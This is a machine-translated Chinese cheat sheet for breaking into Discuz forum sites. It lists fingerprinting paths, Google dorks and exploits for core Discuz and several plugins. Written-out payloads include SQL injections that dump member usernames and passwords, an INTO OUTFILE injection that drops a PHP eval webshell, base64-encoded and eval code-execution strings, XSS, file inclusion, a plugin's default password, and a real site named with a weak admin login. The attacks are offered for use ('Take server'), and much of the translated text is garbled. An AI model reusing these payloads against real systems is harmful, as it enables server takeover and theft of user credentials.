Discuz Vulnerability Summary

Discuz vulnerability Take server

Google keywords and often directories:

# Example: Links ------ Key Words ------CMS Nickname

# Example: Connection ------ Regular Expressions ------ Match Keywords ------CMS Nickname

/------poweredby.*?<------Discuz!------Discuz ( Hong sing )

/------poweredby.*?</a></strong>------Discuz!------Discuz ( Hong sing )

/robots.txt------discuz------discuz ( Hong sing )

/bbcode.js------discuz------discuz ( Hong sing )

/newsfader.js------discuz------discuz ( Hong sing )

/templates.cdb------discuz------discuz ( Hong sing )

/u2upopup.js------discuz------discuz ( Hong sing )

/admin/discuzfiles.md5------discuz------discuz ( Hong sing )

/api/manyou/cloud_channel.htm------discuz------discuz ( Hong sing )

/images/admincp/admincp.js------discuz------discuz ( Hong sing )

/include/javascript/ajax.js------discuz------discuz ( Hong sing )

/mspace/default/style.ini------discuz------discuz ( Hong sing )

/plugins/manyou/discuz_plugin_manyou.xml------discuz------discuz ( Hong sing )

/source/plugin/myapp/discuz_plugin_myapp.xml------discuz------discuz ( Hong sing )

/static/js/admincp.js------discuz------discuz ( Hong sing )

/template/default/common/common.css------discuz------discuz ( Hong sing )

/uc_server/view/default/admin_frame_main.htm------discuz------discuz ( Hong sing )

/bbcode.js------discuz------discuz ( Hong sing )

/newsfader.js------discuz------discuz ( Hong sing )

/templates.cdb------discuz------discuz ( Hong sing )

/u2upopup.js------discuz------discuz ( Hong sing )

/mspace/default1/style.ini------discuz------discuz ( Hong sing )

/uc_server/view/default/admin_frame_main.htm------discuz------discuz ( Hong sing )

Discuz The Basic vulnerabilities:

discuz x1.5 discuz7.2 Backstage Getshell 0day Pass Kill 0day

Discuz a plugin SQL Injection Vulnerability

discuz! 7.1 &7.2 Remote Code Execution vulnerability

discuz! 7.2 manyou plug-in Storm path &getwebshell 0day

discuz! 7.2-x1 Mood Wall Plugin SQL injection and long-lasting XSS Vulnerability

discuz! Account Release Plugin injection 0day

discuz7.x Pass Kill 0day Vulnerability (UCenterHome-2.0)

1, Dz-ychat plug-in injection vulnerability

Vulnerability Link: http://**.**.**.**/plugin.php?id=ychat&mod=rooms&cid=6x

2, Dz-sql injected

Vulnerability Link: http://www.xxcom/faq.php?action= ...

3, source code out of download causes the vulnerability to occur

Vulnerability Link: http://***.com/bbs.tar.gz

4, Discuz emergency box not closed, default password 188281MWWXJK you can sign in

Vulnerability Link: http://www.**.com/source/plugin/tools/tools.php

5, Discuz A weak password causes the vulnerability to occur

Vulnerability Link: http://bbs.wan.58.com/uc_server/admin.php

http://bbs.wan.58.com/uc_server/admin.php?sid= B962WHAGM3MYDVYKLEECVOQSS7PPPJKGUZTZ270FNQQI5F6HEOSAH6OSA7NZMTXLPUIMUJAZ3%2BZADQ Weak password admin

6, discuz X2.5

Vulnerability Description: Broadcast reply exists XSS Vulnerability HTML , script not filtered

7, Discus x2 SQL Injection Vulnerability

Vulnerability Link: http://www.**.com/source\module\forum\forum_attachment.php

8, Basic path of the file

/uc_server/control/admin/db.php

/source/plugin/myrepeats/table/table_myrepeats.php

/install/include/install_lang.php

9, DZ x1.5 dzx7.2 Vulnerability

Backstage: Plugins -- Add plugin -- Please choose how to import : upload the attachment in this post XML file and also tick the allow different versions to be imported discuz! the plugin ( easy to generate error !! )

Shell The address is: data/plugindata/shell.lang.php (discuz x1.5)

Shell The address is: forumdata/plugins/shell.lang.php (discuz 7.2)

Ten, discuz7.x Pass Kill 0day Vulnerability (UCenterHome-2.0)

Dork:powered by Ucenter Inurl:shop.php?ac=view

Dork 2:inurl:shop.php?ac=view&amp;shopid=

Vuln file:Shop.php

Poc file

Shop.php?ac=view&shopid=4 and (Select1 from (SELECT COUNT (*), Concat ((Select (Selectconcat (0x7e,0x27,unhex (Hex ( Database ())), 0x27,0x7e)) frominformation_schema.tables limit 0,1), floor (rand (0) *)) x frominformation_schema.tables Group by X) a) and 1=1

One , DZ Account Release Plugin injection 0day

2Fly Serial number issuing system

file 2fly_gift.php

Exp file

Exp:http://www.xxx.com/2fly_gift.php?pages=content&gameid=16and 1=2 Union Select1,2,3,4,concat (USERNAME,0X3A, Password), 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37from cdb_ Members

Keyword search:

inurl:2fly_gift.php

, dz7.2 Mood Wall Plugin

exist XSS Plugins, Persistent

directly inserted in the mood of the presentation HTML Code

"><script>alert (/xss/) </script>

SQL Inject website, compare chicken, already almost no le

Vulnerability Link: http://www.**.com/plugin.php?id=moodwall&action=edit_mood&moodid=2

13,dz manyou plug-in Storm path

file ./manyou.source/notice.php

/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash= ' Union SelectNULL,NULL , Null,null,0x3c3f70687020406576616c28245f504f53545b274f275d293b3f3e,null,null,null,nullinto outfile ' C:/inetpub/ Wwwroot/shell.php '%23

/manyou/admincp.php?my_suffix=%0a%0dtoby57 Burst Path

14,dz Some basic paths to backup files

/config/config_global.php.bak

/config/config_ucenter.php.bak

/config.inc.php.bak

15,dz6.1 Backstage Pick Shell

Http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yes

Admincp.php?action=runwizard&frames=yes Click Next and then the Forum name place to insert Webshell

<?php eval ($_post[cmd]);? >

Backstage Webshell Address: http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php

Background Template Management -- Default Template sleeve system -- Details

templates/default/actions.lang.php

Jhackj\\ '); eval ($_post[cmd])? >;//

- , Discuz X2.5 Latest Getshell0day Detailed Utilization Method

A remote command execution vulnerability exists on the implementation that can be exploited by a remote attacker to execute remote arbitrary code.

Target enablement is required to successfully exploit this vulnerability SEO function.

Vulnerability file:upload\source\class\helper\helper_seo.php

in the background settings, the front desk can add special content for command execution

We have a visual on the code .

Here's how to use it

1). sign up for any account

2). login user, Post Blog log (note that the log

3). add picture, select Network picture, address write ↓

{${fputs (fopen (Base64_decode (Zgvtby5waha), W), Base64_decode (PD9WAHAGQGV2YWWOJF9QT1NUW2NDKTSGPZ5VAW))}}

4). access logs, generated under the Forum root directory demo.php , a password to send a sentence C

loophole to open SEO , and the user log is turned on SEO , the loophole, black station on the forget.

add it, open it. SEO Yes, but it's not what he said he had to open the log. SEO , as I said in the article above "Various places such as source/include/space/space_blog.php ,

I know everything I know . " just casually mention an example, in fact, in any place can publish the article can, the simplest, forum to find a plate to post the line,

this mainly depends on where the administrator has opened the SEO , and if you don't know where the administrator opened it, SEO just send them everywhere.

The use of the method is not necessarily Blog , also do not have to send network pictures, detailed use I was like casually send a post, content

${${eval (CHR) Chr (104). chr (CHR). chr (102). CHR (111). chr (+). Chr (59))}}----

then add any hyperlinks to him and publish them. phpinfo () , enjoy it:)

- , [email]2 "onmouseover=" alert (2) [/email]

Xss Vulnerability

Inject a user, then post a new log, insert this sentence, and then we click Edit, and it bounces out.

- , DZ x3.1 ultra vires replies

when we visit a forum, there may be a number of possible needs VIP members, can not reply to the post, how to do, we click on the following share, and then, click the same time reply, we will reply successfully, successfully saw the hidden files

+ , a plug-in has a vulnerability

Inurl:plugin.php?id=dc_mail

Use file inclusion to manipulate

**/plugin.php?action=. /.. /.. /.. /.. /data/attachment/forum/201508/02/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

- , mandatory reply

Click Reply Post, found Unable to reply, F12 , and then we modify the following <a href> modified into

<a href= "http://xxx.xxx.xxx/forum.php?mod=post&amp?action=reply&amp?fid=170&amp?tid=9310" onclick= "ShowWindow (' reply ', this.href)" > reply </a>

Then click Reply Post again

+ , Good goods Webmaster Alliance plug-In injection

Click to import an existing interface information

in the App Key out add a sentence 1234 ' ) ; eval ($_post[1]);/ /

then find /data/dzapp-haodai-config.php

and then just Shell the

Access /data/dzapp-haodai-config.php , below 1=phpinfo ()

From for notes (Wiz)

Discuz Vulnerability Summary